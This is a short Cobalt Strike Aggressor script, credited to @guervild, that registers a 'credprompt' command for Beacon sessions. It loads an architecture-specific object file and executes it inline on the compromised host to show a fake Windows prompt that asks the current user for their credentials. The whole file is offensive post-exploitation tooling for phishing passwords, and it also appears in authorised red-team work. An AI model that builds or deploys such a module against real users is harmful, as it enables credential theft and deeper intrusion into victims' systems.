#CredPrompt

beacon_command_register(
"credprompt", 
"Prompt a windows ui to ask current user's credential",
"Usage: credprompt\n" .
"       credprompt \"your text message\"");

alias credprompt {
	local('$handle $data $args');
	
	$bid = $1;

	# figure out the arch of this session
	$barch  = barch($1);

	# read in the right BOF file
	$handle = openf(script_resource("credprompt.".$barch.".o"));
	$data = readb($handle, -1);
	closef($handle);

	# pack our arguments
	$args = bof_pack($bid, "z", $2);
	
	btask($bid, "CredPrompt (@guervild)");
	
	# execute it.
	beacon_inline_execute($bid, $data, "go", $args);
}